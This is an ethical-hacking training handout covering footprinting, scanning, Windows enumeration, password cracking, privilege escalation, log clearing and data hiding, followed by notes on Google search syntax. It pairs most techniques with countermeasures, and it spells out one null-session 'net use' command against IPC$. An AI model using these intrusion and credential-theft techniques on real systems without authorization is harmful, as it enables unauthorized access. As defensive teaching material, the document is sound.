Study Material by

HACKING – The Art of Exploitation
Sponsored by

Material provided here is compiled from different sources and Technobuzz or Impeccable Trainers do not guarantee 100% accuracy of information. If finding something wrong then revert us on

Hacking is the most exhilarating game on the planet. But it stops being fun when you end up in a cell. But hacking doesn't have to mean breaking laws. In this we teach safe hacking so that you don't have to keep looking back over your shoulders for narks and cops. What we're talking about is hacking as a healthy recreation, and as a free education that can qualify you to get a high paying job. In fact, many network systems administrators, computer scientists and computer security experts first learned their professions, not in some college program, but from the hacker culture. And you may be surprised to discover that ultimately the Internet is safeguarded not by law enforcement agencies, not by giant Corporations, but by a worldwide network of, yes, HACKERS. You too, can become one of us. And Hacking can be surprisingly easy. However, before you plunge into the hacker subculture, be prepared for that hacker attitude. You have been warned. So...welcome to the adventure of HACKING! WHAT DO I NEED IN ORDER TO HACK? You may wonder whether hackers need expensive computer equipment and a shelf full of technical manuals. The answer is NO! Hacking can be surprisingly easy! Better yet, if you know how to search the Web, you can find almost any computer information you need for free. In fact, hacking is so easy that if you have an on-line service and know how to send and read email, you can start hacking immediately. We see many hackers making a big deal of themselves and being mysterious and refusing to help others learn how to hack. Why? Because they don't want you to know the truth, which is that most of what they are doing is really very simple! Well, we thought about this. We too, could enjoy the pleasure of insulting people who ask us how to hack. Or we could get big egos by actually teaching thousands of people how to hack. HOW NOT TO GET BUSTED? One slight problem with hacking is that if you step over the line, you can go to jail. We will do our best to warn you when we describe hacks that could get you into trouble with the law. But we are not attorneys or experts on cyber law. In addition, every state and every country has its own laws. And these laws keep on changing. So you have to use a little sense.

But the best protection against getting busted is the Golden Rule. If you are about to do something that you would not like to have done to you, forget it. Do hacks that make the world a better place, or that are at least fun and harmless, and you should be able to keep out of trouble. ETHICS AND LEGALITIES… Nothing contained in this Cram Session is intended to teach or encourage the use of security tools or methodologies for illegal or unethical purposes. Always act in a responsible manner. Make sure you have written permission from the proper individuals before you use any of the tools or techniques described in this Cram Session. TERMINOLOGIES Exploit: According to the Jargon Dictionary, an exploit is defined as, vulnerability in software that is used for breaking security‖. Hackers rely on exploits to gain access to, or to escalate their privileged status on, targeted systems. SECURITY TRIANGLE:





ATTACKER‘s PROCESS: Attackers follow a fixed methodology. The steps involved in attacks are shown below:     Foot Printing Scanning Enumeration Penetration-(Individuals that are unsuccessful at this step may opt for a Denial of Service attack)  Escalation of Privilege  Cover Tracks  Backdoors RECONNAISSANCE: Reconnaissance is one of the most important steps of the hacking process. Before an actual Vulnerability can be exploited it must be discovered. Discovery of potential vulnerabilities is aided by identification of the technologies used, operating systems installed, and services/applications that are present. Reconnaissance can broadly be classified into two categories: Passive Reconnaissance Active Reconnaissance

TYPES OF ATTACKS: There are several ways in which hackers can attack your network. No matter which path of opportunity they choose, their goal is typically the same: control and use of your network and its resources.  LAN Attack  WAN Attack  Physical Entry  Stolen Equipment  Unsecured Wireless Access  Dialup Attack

CATEGORIES OF EXPLOITS: An exploit is the act of taking advantage of a known vulnerability. When ethical hackers discover new vulnerabilities, they usually inform the product vendor before going public with their findings. This gives the vendor some time to develop solutions before the vulnerability can be exploited. Some of the most common types of exploits involve: Program bugs, Buffer overflows, Viruses, Worms, Trojan Horses, Denial of Service and Social Engineering.

GOALS OF HACKER: While the type of attack may vary, the hacker will typically follow a set methodology. This includes:  Reconnaissance  Gaining Access  Maintaining Access  Covering Tracks

ETHICAL HACKER & CRACKER: Historically the term HACKER was not viewed in a negative manner. It was someone that enjoys exploring the nuances of a programs, applications and operating systems. The term CRACKER usually refers to a ―Criminal Hacker‖. This person uses his skills for malicious intent.

Q. Who are Ethical Hackers? Successful ethical hackers possess a variety of skills. First and foremost, they must be completely trustworthy. Ethical hackers typically have very strong programming and computer networking skills. They are also adept at installing and maintaining systems that use the more popular operating systems (e.g., Linux or Windows) used on target systems. These base skills are augmented with detailed knowledge of the hardware and software provided by the more popular computer and networking hardware vendors.

CATEGORIES OF ETHICAL HACKER: White Hat Hackers – perform ethical hacking to help secure companies and organizations. Reformed Black Hat Hackers – claim to have changed their ways and that they can bring special insight into the ethical hacking methodology. Gray Hats-Individuals who work both offensive and defensively according to the situations.

NEED OF INFORMATION TECHNOLOGY IN WORLD: Security compliance is must for all companies with IT backbone. The requirement is high with organizations in IT / ITES segment. Information workers lack of basic security knowledge. Information Security are been offered to professional in IT security BENEFITS OF INFORMATION TECHNOLOGY: Be an Information Security Professional. Prepare for Hacking threats of tomorrow. Secure Desktop, LAN from crackers. Understand attacks via Virus, Worms and Trojans and preventing them. Implement IDS. Understand Technical attacks like DDOS, SQL injections etc and take precautions. Secure your sensitive data using cryptography and steganography. Secure your emails

and take precautions from Email attacks. Understand the various levels at which you might get hacked. Stop Cyber Terrorism. Using Google as an aid to Information Security. Carry out cyber Investigations and Computer Forensics. Understand Mobile Security and Related Problems. Learn and implements Router security.

TYPES OF TESTING/EVALUATION: Internal Evaluation External Evaluation Stolen Equipment Evaluations

COMPUTER CRIME: The United States Department of Justice defines computer crime as "any violation of criminal law that involved the knowledge of computer technology for its perpetration, investigation, or prosecution." VARIOUS LAWS:               Spy Act U.S Federal Laws United Kingdom‘s Cyber Laws European Laws Japan‘s Cyber Laws Australia: The Cyber Crime Act 2001 Indian Law: The Information Technology Act Germany‘s Cyber Law Singapore‘s Cyber Law Belgium Law Brazilian Law Canadian Law France Law Italian Law

―CYBER CRIME‖ is an amorphous field. It refers broadly to any criminal activity that pertains to or is committed through the use of the Internet. A wide variety of conduct fits within this capacious definition. We will concentrate on five activities that have been especially notorious and that have strained especially seriously the fabric of traditional criminal law: use of the Internet to threaten or stalk people; ONLINE FRAUD; ―HACKING‖; ONLINE DISTRIBUTION OF CHILD PORNAGRAPHY; & CYBERTERRORISM.

CYBER STALKERS: "Stalkers harness the tremendous power of the Web to learn about their prey and to broadcast false information about the people they target. And the Internet - the same tool they use to investigate and spread terror - provides stalkers with almost impenetrable anonymity." In cyberspace, stalking and harassment may occur via e-mail and through user participation in news groups, bulletin boards, and chat rooms. One major difference from off-line stalking is that cyberstalkers can also dupe other Internet users into harassing or threatening victims. The term "CYBERSTALKING" has been coined to refer to the use of the Internet, e-mail, or other electronic communications devices to stalk another person. Because of the emerging nature of this form of stalking, the available evidence of cyberstalking is still largely anecdotal, but it suggests that the majority of cyberstalkers are men and the majority of their victims are women. As in off-line stalking, in many on-line cases, the cyberstalker and the victim had a prior relationship, and when the victim attempts to end the relationship, the cyberstalking begins. IT ACT 2000(Information Technology Act-2000):  Sec -66. Hacking with computer system. (1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hack. (2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend upto two lakh rupees, or with both.  Sec-67. Publishing of information which is obscene in electronic form. Whoever publishes or transmits or causes to be published in the electronic form, any material which is lascivious or appeals to the prurient interest or if its effect is such as to tend to deprave and corrupt persons who are likely, having regard to all relevant circumstances, to read, see or hear the matter contained or embodied in it, shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to one lac rupees and in the event of a second or subsequent conviction with imprisonment of either description for a term which may extend to ten years and also with fine which may extend to two lacs rupees.

 Sec-65.Tampering with computer source documents. Whoever knowingly or intentionally conceals, destroys or alters or intentionally or knowingly causes another to conceal, destroy or alter any computer source code used for a computer, computer programme, computer system or computer network, when the computer source code is required to be kept or maintained by law for the time being in force, shall be punishable with imprisonment up to three years, or with fine which may extend up to two lacs rupees, or with both.  Sec-43. Penalty for damage to computer, computer system, etc. If any person without permission of the owner or any other person who is in charge of a computer, computer system or computer network,(a) Accesses or secures access to such computer, computer system or computer network; (b) Downloads, copies or extracts any data, computer data base or information from such computer, computer system or computer network including information or data held or stored in any removable storage medium; (c) Introduces or causes to be introduced any computer contaminant or computer virus into any computer, computer system or computer network; (d) Damages or causes to be damaged any computer, computer system or computer network, data, computer data base or any other programs residing in such computer, computer system or computer network; (e) Disrupts or causes disruption of any computer, computer system or computer network; (f) Denies or causes the denial of access to any person authorized to access any computer, computer system or computer network by any means; (g) Provides any assistance to any person to facilitate access to a computer, computer system or computer network in contravention of the provisions of this Act, rules or regulations made there under; (h) charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system, or computer network, he shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected. TRAFFICKING: "Trafficking in counterfeit label for phone records, copies of computer programs or computer program documentation or packaging, and copies of motion pictures or other audio visual works."

Law is applicable if:  Persons knowingly traffics in a counterfeit label affixed or designed to be affixed.  Intentionally traffics a counterfeit document or packaging for a computer program. Penalty: Fine and Imprisonment is imposed.

FOOTPRINTING: Footprinting is the process of gathering as much information about an organization as possible. The objective of footprinting is to gather this information in such a way as to not alert the organization. This information is publicly available from third parties and from organization itself. WEB BASED TOOLS: Many web based tools are available to help uncover domain information. This services provide whois information, DNS information, and network queries. Eg: Sam Spade Geek Tools Betterwhois Dshield IANA The Internet Assigned Number Authority is a nonprofit organization that is responsible for preserving the central functions of the global Internet for the public good. IANA is a good starting point for determining details about a domain. IANA lists all the top level domains of each country and their associated technical and administrative contacts. Most of the associated domains will allow you to search by the domain name. RIR‘s Regional Internet Registries are granted authority by ICANN to allocate IP address blocks within their respective geometrical areas. These database are an excellent resource to use to further research a domain once you have determined what area of the world it is located in.

Domain Location and Path Discovery If you are unsure of a domain‘s location, the best way to determine its location is by use of the traceroute command. Traceroute determines a path to a domain by incrementing the TTL field of the IP header. When the TTL falls to zero, an ICMP message is generated. These ICMP messages identify each particular hop on the path to the destination. There are several good GUI based traceroute tools available. These tools draw a visual map that displays the path and destination NeoTrace & VisualRoute are two GUI based tools that maps path and destination. ARIN, RIPE AND Regional Databases RIR, s is searchable by IP address. If you have the domain name, you can resolve to the IP by pinging the domain name. RIR‘s and their area of control include: American Registry for International Numbers(ARIN) Reseaux IP Europeans Network Coordination(RIPE) Asia Pacific Network Information Center(APNIC) African Regional Internet Registry(AFRINIC) Latin American and Caribbean Network Information Center(LACNIC) Determining the Network Range You can query the RIR to find out what network range the organization owns. If you chose the wrong RIR, you will typically receive an error message that will point you to the correct record holder. Discovering the Organization‘s Technology There are many ways in which individuals can passively determine the technology an organization uses. Some examples are JOB BOARDS & GOOGLE GROUPS. Email Tips & Tricks The Simple Mail Transfer Protocol is used for sending Email. Every Email you receive has a header that contains information such as the IP address of the server sending the message, the names of any attachments included with the Email and the time and date the Email was sent and received. Bouncing Email One popular technique is to send an email to an invalid email address. The sole purpose of this activity is to examine the SMTP header that will be returned. This may reveal the Email server‘s IP address, application type and the version. Other way to track interesting email is to use software that will allow you to verify where the email originated and how the recipient handled it, such as emailtraking pro and

SCANNING: Once a hacker has moved to the scanning phase his goal will be identify active systems. There are several ways this identification can take place. The methods of identification of active systems include: War Dialing War Driving Pinging Port Scanning Regardless of the method chosen the goal is still the same: Identify that the system is live Determine its services Verify its OS Pinpoint its vulnerabilities War Dialing While some may see war dialing as a dated art, it still has its place in the hacker‘s arsenal of tools. If a thorough footprint has been performed, phone numbers were most likely found that can be associated to the organization. The numbers can serve as a starting point for war dialing scans. The hacker‘s goal will be to uncover modems that may have been left open. Administrators may have configured these for out-of-band management. The goal of an ethical hacker is to uncover these devices during the security audit to make sure they are removed, as modems offer a way to bypass the corporate firewall. The tools most commonly used for war dialing include: THC-Scan, PhoneSweep War Dialer and Telesweep. War Driving This mode of penetration relies on finding unsecured wireless access points. A popular tool used for this operation is Netstumbler. ICMP – Ping Using the ping command is one of the easiest ways to determine if a system is reachable. Ping is actually an ICMP(Internet Control Message Protocol) echo request-response. Its original purpose was to provide diagnostic abilities to determine whether a network or device was reachable. The important thing to remember about ping is that just because a system does not respond to ping, that doesn‘t mean that it is not up. It might simply mean that ICMP type 0 and/or type 8 messages have been blocked by the target organization. There are many tools available that can be used to automate the ping process. These tools will typically ping sweep an entire range of addresses. Some of these include: Pinger, Friendly Pinger, WS_Ping_Pro, NetScan Tools Pro 2000, Hping2, and KingPing.

Detecting Ping Sweeps Most IDS systems, such as SNORT, will detect ping sweeps. While performing a ping sweep is not illegal, it should alert an administrator, as it is generally part of the pre-attack phase. Port Scanning Port scanning allows a hacker to determine what services are running on the systems that have been identified. If vulnerable or insecure services are discovered, the hacker may be able to exploit these to gain unauthorized access. There are a total of 65,535 * 2 ports (TCP & UDP). While a complete scan of all these ports may not be practical, an analysis of popular ports should be performed. Many port scanners ping first, so make sure to turn this feature off to avoid missing systems that have blocked ICMP.Popular port scanning programs include: Nmap, Netscan Tools, Superscan and Angry IP Scanner.

TCP Basics As TCP is a reliable service, a 3-step startup is performed before data is transported. ACK‘s are sent to acknowledge data transfer and a four-step shut down is completed at the end of a communications session. TCP uses flags (Urgent, Acknowledgement, Push, Reset, Synchronize, and Finish) to accomplish these tasks. Port scanners manipulate these flag settings to bypass firewalls and illicit responses from targeted systems. TCP Scan Types Most port scanners make full TCP connections. Stealth scanners do not make full connections and may not be detected by some IDS systems. Nmap is one of the most popular port scanners. Some common types of ports scans are: Ping Scan, SYN Scan, Full Scan, ACK Scan and XMAS Scan. UDP Basics UDP is a connectionless protocol. If ICMP has been blocked at the firewall, it can be much harder to scan for UDP ports than TCP ports, as there may be no returned response. Just as with TCP, hackers will look for services that can be exploited such as chargen, daytime, tftp, and echo. One of the best UDP and TCP port scanners is Nmap. Nmap (network mapper) is an open source port scanner that has the capability to craft packets in many different ways. This allows the program to determine what services an OS is running.

Port Scan Countermeasures Practice the principle of least privilege. Don‘t leave unneeded ports open and block ICMP echo requests at the firewall or external router. Allow traffic through the external router to only specific hosts. Fingerprinting Fingerprinting is the process of determining the OS that is running on the target system.

I. Active Stack FingerprintingActive stack fingerprinting relies on subtle differences in the responses to specially crafted packets. The most well-known program used for active stack fingerprinting is Nmap. The –0 option is used for fingerprinting. For a reliable prediction, one open port and one closed port is required. II. Passive Stack FingerprintingPassive fingerprinting is less reliable than active fingerprinting. Its primary advantage is that it is stealthy. It relies on capturing packets sent from the target system. Banner Grabbing Banner grabbing is used to identify services. Banner grabbing works by making connections to the various services on a host and looking at the response to hopefully determine the exact service and version running on that port. Once these services are confirmed, this information can help to identify possible vulnerabilities and the OS that the system is running. Netcraft, Telnet and FTP are some of the common tools used to grab banners. Identifying Vulnerabilities Once a hacker has completed the scanning steps described in this section, he will attempt to identify vulnerabilities. Vulnerabilities are typically flaws or weaknesses in the software or the OS. Vulnerabilities lead to risk and this presents a threat to the target being scanned. Three terms to remember include: Vulnerability - A flaw or weakness in software. OS Risk - The likelihood of a threat exploiting vulnerability such that a hacker will be allowed unauthorized access or create a negative impact. Threat - The potential for a hacker to use vulnerability.

Enumeration: Enumeration is the process of identifying each domain that is present within the LAN. These domains are typically identified using built-in Windows commands. The ―net command‖ is the most widely used of these commands. Once the various domains have been identified, each host can be further enumerated to uncover its role. Likely targets of malicious hackers include: PDC‘s, dual homed computers, database servers, and web servers. The very act of Windows enumeration is possible because these computers advertise themselves via browse lists. To see a good example of this technology, take a look at Network Neighborhood on Windows systems. These services are identifiable by the ports that can be found while performing the network scans that were discussed in the previous section. The ports associated with these services are as follows: 135 – MS-RPC Endmapper 137 – NetBIOS Name Service 138 – NetBIOS Datagram Service 139 – NetBIOS Session Service 445 – SMB over TCP/IP (Windows 2K and above) NetBIOS Null Sessions Once individual computers are identified, malicious hackers will next attempt to discover the role of the system by using NetBIOS Null Sessions. The legitimate purpose of a Null Session is to allow unauthenticated computers to obtain browse lists from servers, allow system accounts access to network resources, or to allow a null session pipe. A null session pipe is used when a process on one system needs to communicate with a process on another system. Legitimate null sessions are established over the IPC$ share. The Inter-Process Communication Share Windows computers communicate with each other over the IPC$ "Inter-Process Communication" share. It is used for data sharing between applications and computers. In Windows NT and 2000 computers, it is on by default. You can think of IPC$ as the pipeline that facilitates file and print sharing. This is a huge vulnerability as hackers can connect to your IPC$ share using the net use command (net use \\IP\IPC$ "" /u:""). Once this connection has been made, many types of sensitive information can be retrieved, such as user names, comments, shares, and logon policies. What is most alarming about this vulnerability is that the attacker is able to logon with a null username and null password. NBTSTAT The NBTSTAT command can be used to further identify the services that are running on a particular system. For a listing of the type codes and their corresponding service, visit the following link:

Active Directory Enumeration To perform an Active Directory enumeration, you must have access to port 389 (LDAP Server). You must also be able to authenticate yourself as a guest or user. Then, if these conditions are met, enumeration of users and groups can proceed. Removing compatibility with all pre-windows 2000 computers during the installation of Active Directory can prevent this vulnerability. Identifying Win2000 Accounts Every object in Windows has a unique security identifier (SID). The SID is made up of two parts. The first part identifies the domain and is unique to it. The second part is a descriptor of the specific account. This second part is referred to as the relative identifier (RID). These follow a specific order and are tied to unique roles within the domain. RID's are defined as follows: Account RID Administrator 500 Guest 501 Domain users 1000 (and up) So, while some administrators may promote the practice ―security through obscurity‖ and rename accounts such as administrator, the RID of the account will remain unchanged. Tools such as USER2SID and SID2USER can be used to determine the true administrator account of the domain. DumpSec DumpSec is another tool that will allow for account enumeration. Once a null session has been established, this GUI tool will display information on users, account data, shares, and account policies.

Null Session Countermeasures Disable File and Print sharing. Inside network properties, under Advanced Settings, disable NetBIOS over TCP/IP. Null sessions require access to ports 135-139 or 445. Blocking access to these ports will also prevent these exploits. There is also a setting in Settings -> Control Panel -> Administrative Tools –> Local Security Policy –> Local Policies –> Security Options –> Restrict Anonymous. In Windows 2000, this registry key has three possible settings: 0 – No Restrictions 1 - Allow null sessions but disallow account enumeration 2 - No null sessions are allowed The default setting is ―0‖. A setting of ―2‖ should be verified on a test network before use in a production setting as some older or custom applications may not function properly with it.

Account Enumeration Account enumeration is a further probing of accounts. Before a concerted attack can take place, account policies and shares must be uncovered. As well, before attempting to connect to an active account, the attacker must identify an open share to which he can connect. Also, if there is a lock out policy in place, this must be determined. Otherwise, running tools such as NAT may result in the lockout of all accounts. This will do the attacker little good unless he is attempting DoS. Tools such as Enum, User Info, GetAcct, and SNMPUtil can be used to accomplish this task.

SNMP Enumeration SNMP (Simple Network Management Protocol) is a network management standard widely used within TCP/IP networks. It provides a means of managing routers, switches, and servers from a central location. It works through a system of agents and managers. SNMP provides only limited security through the use of community strings. The defaults are ―public‖ and ―private‖ and are transmitted over the network in clear text. Devices that are SNMP enabled, share a lot of information about each device that probably should not be shared with unauthorized parties. Hence consider changing the default passwords‘ community strings.

SNMPUtil is a Windows enumeration tool that can be used to query computers running SNMP. IP Network Browser SolarWinds IP Network Browser is a GUI based network discovery tool. It allows you to scan a detailed discovery on one device or an entire subnet. SNMP Enumeration Countermeasures As with all other services, the principle of least privilege should also be followed here. If you don‘t need SNMP, turn it off. You should always seek to remove or disable all unnecessary services. If you must use SNMP, change the default community strings and block port 161 at key points throughout the network.

System/Windows hacking is the point at which the line is crossed and an actual connection is made. It is the first true attack phase as the attacker is actually breaking and entering. This may be achieved by an administrative connection or an enumerated share.

Identifying Shares One of the easiest ways to enumerate shares is with the net view command. This will identify all public shares. Hidden shares, those followed by a ―$‖ will not be displayed. Common hidden shares include: IPC$, C$, D$ and Admin$ There are several GUI tools that can be used to identify non-hidden and hidden shares, such as, DumpSec and Legion. Password Guessing Many times, password guessing is successful because people like to use easy to remember words and phrases. A diligent attacker will look for subtle clues throughout the enumeration process to key in on probable words or phrases the account holder may have used for a password. Accounts that will be focused on for possible attack include: Accounts that haven‘t changed passwords Service accounts Shared accounts Accounts that indicate the user has never logged in Accounts that have information in the comment field that may compromise password security Manual Password Guessing Assuming that a vulnerable account has been identified, the most common method of attack is manual password guessing. The net use command can be issued from the command line to attempt the connection. Performing Automated Password Guessing If manual password cracking was unsuccessful, attackers will most likely turn to automated tools. Most automated password guessing tools use dictionaries to try to crack accounts. These attacks can be automated from the command line by using the ―FOR‖ command or they can also be attempted by using tools such as NAT or ENUM. To use NAT, two files would first need to be created. The first would contain a list of possible user names, while the second would comprise a dictionary file. Each user name would be attempted with every word in the dictionary until a match was achieved or all possibilities were exhausted.

Password Guessing Countermeasures Password guessing is made much more difficult when administrators use strict password policies. These policies should specify passwords that: Are complex Contain upper case and lower case letters Use numbers, letters, and special characters

It is not uncommon to hear individuals talk about pass-phrases; this concept helps users realize that common words are not robust passwords. Another excellent password guessing countermeasure is to simply move away from passwords completely. Of the three types of authentication (see below), passwords are the weakest: Something You Know - Passwords Something You Have - Smart Cards Something You Are – Biometrics Monitoring Event Viewer Logs No matter which form of authentication you choose, policies should be in place that require the regular review of event logs. Attacks cannot be detected if no one is monitoring activity. Luckily, there are tools to ease the burden of log file review and management. VisualLast is a tool that makes it easy to assess the monitor log activity and has a number of sophisticated features. Sniffing Passwords Windows uses a challenge / response authentication method that is based on the NTLM protocol. The protocol requires a client to contact a server for domain authentication and a hash is passed. NTLM also functions in a peer-to-peer network. Through the years, NTLM has evolved. The three basic forms of NTLM are listed below: LAN Manager – Insecure, used for Windows 3.11, 95, and 98 computers NTLM V1 – Used for Windows NT Service Pack 3 or earlier NTLM V2 – A more secure version of challenge response protocol used by Windows 2000 and XP One problem with NTLM is that it is backwards compatible by default. This means if the network contains Windows 95/98 computers, the protocol will step down to the weaker form of authentication to try to allow authentication. This can be a big security risk. It is advisable to disable this by making a change to the Local Policies Security Options template. Another problem with NTLM is that tools have been developed that can extract the passwords from the logon exchange. One such set of tools is ScoopLM and BeatLM from ; another is L0phtCrack. NTLM is not the only protocol that might be sniffed on an active network. Tools also exist to capture and crack Kerberos authentication. The Kerberos protocol was developed to provide a secure means for mutual authentication between a client and a server. Kerberos is found in large complex network environments. One of the tools that might be used to attempt to defeat this protocol is KerbCrack.

Privilege Escalation If by this point the attacker has compromised an account, but not one of administrator status, the amount of damage he can do is limited. To be in full control of the system, the attacker needs administrator status. This is achieved through privilege escalation. What makes this most difficult is that these exploits must typically be run on the system under attack. Three ways this may be achieved:

Trick the user into executing a particular program. Copy the privilege escalation program to the system and schedule it to run at a predetermined time Gain interactive access to the system. Retrieving the SAM File One of the first activities that an attacker will usually attempt after gaining administrative access is that of stealing the SAM (Security Account Manager) file. The SAM contains the user account passwords stored in their hashed form. Microsoft raised the bar with the release of NT service pack 3. Products newer than this release contain a second layer of encryption called the SYSKEY. Even if an attacker obtains the SYSKEY hash, he must still defeat its 128-bit encryption. Todd Sabin found a way around this through the process of DLL injection and created a tool called Pwdump. This tool allows the attacker to hijack a privileged process and bypass SYSKEY encryption. Pwdump requires administrative access. Cracking Windows Passwords Once the passwords have been stolen, they will need to be cracked. This can be accomplished by using a password-cracking program. Password cracking programs can mount several different types of attacks. These include: Dictionary Attack Hybrid Attack Brute Force Attack. Windows Password Insecurities One of the big insecurities of Windows passwords is that if the WIN2K domain is set up to be backwards compatible, the passwords are 14 characters or less. This version of the hash is known as the LanManager (LANMAN) Hash. What makes LANMAN quickly crackable is that while the password can be up to 14 characters, the passwords are actually divided into two 7 character fields. Thus, cracking can proceed simultaneously against each 7-character field. Several tools are available to exploit this weakness, including, L0phtCrack and John the Ripper. Password Cracking Countermeasures The domain password policy should be configured to restrict users from using the same password more than once or at least configured where eight to ten new passwords must be used before an individual can reuse an old password again. This policy can be enforced through the local / domain security policy. Passwords: Should be at least 7 or 14 characters long Should be upper and lower case Should be numbers, letters, and special characters (*! &@#%$) Should have a maximum life of no more than 30-days

Another countermeasure to password cracking is to use one-time passwords. There are several different one-time password schemes available. The most widely used replacement is the smart cards; SecurID is a popular choice. SMB Redirection An SMB (Server Message Block) redirect attack may be attempted by tricking a user to authenticate to a bogus SMB server. This allows the attacker to capture the victim‘s hashed credentials. This may be attempted by tricking the user to click on a link embedded in an e-mail. Users should always use caution when clicking on e-Mail links. Several tools are available to help attackers pull off this hack. One of these tools is SMBRelay, a fraudulent SMB server used to capture usernames and passwords. Physical Access If an attacker can gain physical access to your facility or equipment, he‘ll own it. Without physical access control, all administrative and technical barriers can typically be overcome. This holds true for any piece of equipment. Even routers are not immune. Cisco‘s website details how to reset passwords if you have physical access. Many programs are available that can be used to bypass NTFS security or to reset the administrator password. Some of the programs are: Offline NT Password Resetter, NTFSDOS and LinNT.

Keystroke Logging Keystroke loggers can be hardware or software based. These programs will log and capture all the keystrokes a user types. Some of these programs, such as eBlaster, will even secretly e-mail the captured keystrokes to a predetermined e-mail account. Keystroke Loggers (or Keyloggers) intercept the Target‘s keystrokes and either saves them in a file to be read later, or transmit them to a predetermined destination accessible to the Hacker. Since Keystroke logging programs record every keystroke typed in via the keyboard, they can capture a wide variety of confidential information, including passwords, credit card numbers, and private Email correspondence, names, addresses, and phone numbers.

Some Famous Keyloggers       Actual Spy Perfect Keylogger Family Keylogger Home Keylogger Soft Central Keylogger Adramax Keylogger

Rootkits Rootkits are malicious code that is developed for the specific purpose of allowing hackers to gain expanded access to a system and hide their presence. While rootkits have been available in the Linux world for many years, they are now starting to make their way into the Windows environment. Rootkits are considered freeware and are readily available on the Internet. If you suspect a computer has been rootkitted, you‘ll need to use an MD5 checksum utility or a program such as Tripwire to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media. Evidence Hiding Once an attacker has gained full control of the victim‘s computer, he will typically try to cover his tracks. According to Locard's Exchange Principle, ―whenever someone comes in contact with another person, place, or thing, something of that person is left behind.‖ This means the attacker must clear log files, eliminate evidence, and cover his tracks. A common tool the attacker will use to disable logging is the auditpol command. The attacker will also attempt to clear the log. This may be accomplished with the Elsave command. This will remove all entries from the logs, except one showing the logs were cleared. Other tools an attacker may attempt to use at this point include Winzapper and Evidence Eliminator. File Hiding Various techniques are used by attackers in an attempt to hide their tools on the compromised computer. Some attackers may just attempt to use attrib to hide files, while others may place their warez in low traffic areas; e.g., winnt/system32/os2drivers. One of the most advanced file hiding techniques is NTFS File Streaming. A tool that is available to detect streamed files is Sfind. Data Hiding Other data hiding techniques deal with moving information in and out of networks undetected. This can be accomplished through the use of bitmaps, MP3 files, Whitespace hiding, and others. Each is briefly described below:

Steganography- The art of hiding text inside of images ImageHide – A Stego program MP3Stego – A Stego program that hides text in MP3 files Snow – A Stego program that hides text in the whitespace inside of documents Camera/Shy – Used to hide text in web based images While there are tools such as StegDetect that can sometimes find these files, that by no way means you will be able to break their encryption and uncover the contents.

Prompting the Box The final step for the attacker is that of becoming the target. Up to this point, the attacker has been able to maintain a connection to the target, but may not yet have the ability to execute and run programs locally. The following three tools will allow the attacker to become the target: Psexec, Remoxec, and Netcat. When the attacker has a command prompt on the victim‘s computer, he will typically restart the methodology looking for other internal targets to attack and compromise.

Google Searching Basics:
Building Google Queries: Google query building is a process. There‘s really no such thing as an incorrect search. It‘s entirely possible to create an ineffective search, but with the explosive growth of the Internet and the size of Google‘s cache, a query that‘s inefficient today may just provide good results tomorrow—or next month or next year. The idea behind effective Google searching is to get a firm grasp on the basic syntax and then to get a good grasp of effective narrowing techniques. Learning the Google query syntax is the easy part. Learning to effectively narrow searches can take quite a bit of time and requires a bit of practice. Eventually, you‘ll get a feel for it, and it will become second nature to find the needle in the haystack. Golden Rules of Google Searching: 1. Google queries are not case sensitive. Google doesn‘t care if you type your query in lowercase letters (hackers), uppercase (HACKERS), camel case (hAcKeR), or psycho-case (haCKeR)—the word is always regarded the same way. 2. Google wildcards Google‘s concept of wildcards is not the same as a programmer‘s concept of wildcards. Most consider wildcards to be either a symbolic representation of any single letter (UNIX fans may think of the question mark) or any series of letters represented by an asterisk. This type of technique is called stemming. Google‘s wildcard, the asterisk (*), represents nothing more than a single word in a search phrase. Using an asterisk at the beginning or end of a word will not provide you any more hits than using the word by itself. 3. Google stems automatically. Google will stem, or expand, words automatically when it‘s appropriate. For example, consider a search for pet lemur dietary needs, as shown in Figure 1.12. Google will return a hit that includes the word lemur along with pet and, surprisingly, the word diet, which is short for dietary. Keep in mind that this automatic stemming feature can provide you with unpredictable results. 4. Google reserves the right to ignore you Google ignores certain common words, characters, and single digits in a search. These are sometimes called stop words. When Google ignores any of your search terms, you

will be notified on the results page, just below the query box, as shown in Figure 1.13. Some common stop words include who, where, what, the, a, or an. Curiously enough, the logic for word exclusion can vary from search to search. 5. Ten-word limit Google limits searches to 10 terms. This includes search terms as well as advanced operators, which we‘ll discuss in a moment. There is a fairly effective way to get more than 10 search terms crammed into a query: Replace Google‘s ignored terms with the wildcard character (*). Google does not count the wildcard character as a search term, allowing you to extend your searches quite a bit. Basic Searching Google searching is a process, the goal of which is to find information about a topic. The process begins with a basic search, which is modified in a variety of ways until only the pages of relevant information are returned. Google‘s ranking technology helps this process along by placing the highest-ranking pages on the first results page. The details of this ranking system are complex and somewhat speculative, but suffice it to say that for our purposes Google rarely gives us exactly what we need following a single search. Using Boolean Operators and Special Characters More advanced than basic word searches, phrase searches are still a basic form of a Google query. To perform advanced queries, it is necessary to understand the Boolean operators AND, OR, and NOT. To properly segment the various parts of an advanced Google query, we must also explore visual grouping techniques that use the parenthesis characters. Finally, we will combine these techniques with certain special characters that may serve as shorthand for certain operators, wildcard characters, or placeholders. Boolean operators help specify the results that are returned from a query. If you are already familiar with Boolean operators, take a moment to skim this section to help you understand Google‘s particular implementation of these operators, since many search engines handle them in different ways. Improper use of these operators could drastically alter the results that are returned. The most commonly used Boolean operator is AND. This operator is used to include multiple terms in a query. For example, a simple query like hacker could be expanded with a Boolean operator by querying for hacker AND cracker. The latter query would include not only pages that talk about hackers but also sites that talk about hackers and the snacks they might eat. Some search engines require the use of this operator, but Google does not. The term AND is redundant to Google. By default, Google automatically searches for all the terms you include in your query. The plus symbol (+) forces the inclusion of the word that follows it. There should be no space following the plus symbol. Another common Boolean operator is NOT. Functionally the opposite of the AND operator, the NOT operator excludes a word from a search. One way to use this operator is to preface a search word with the minus sign (–). Be sure to leave no space between the minus sign and the search term. Consider a simple query such as hacker. This query is very generic and will return hits for all sorts of occupations, like golfers, woodchoppers, serial killers, and those with chronic bronchitis. With this type of query, you are most likely not interested in each and every form of the word hacker but rather a more specific rendition of the term. To narrow the search, you could include

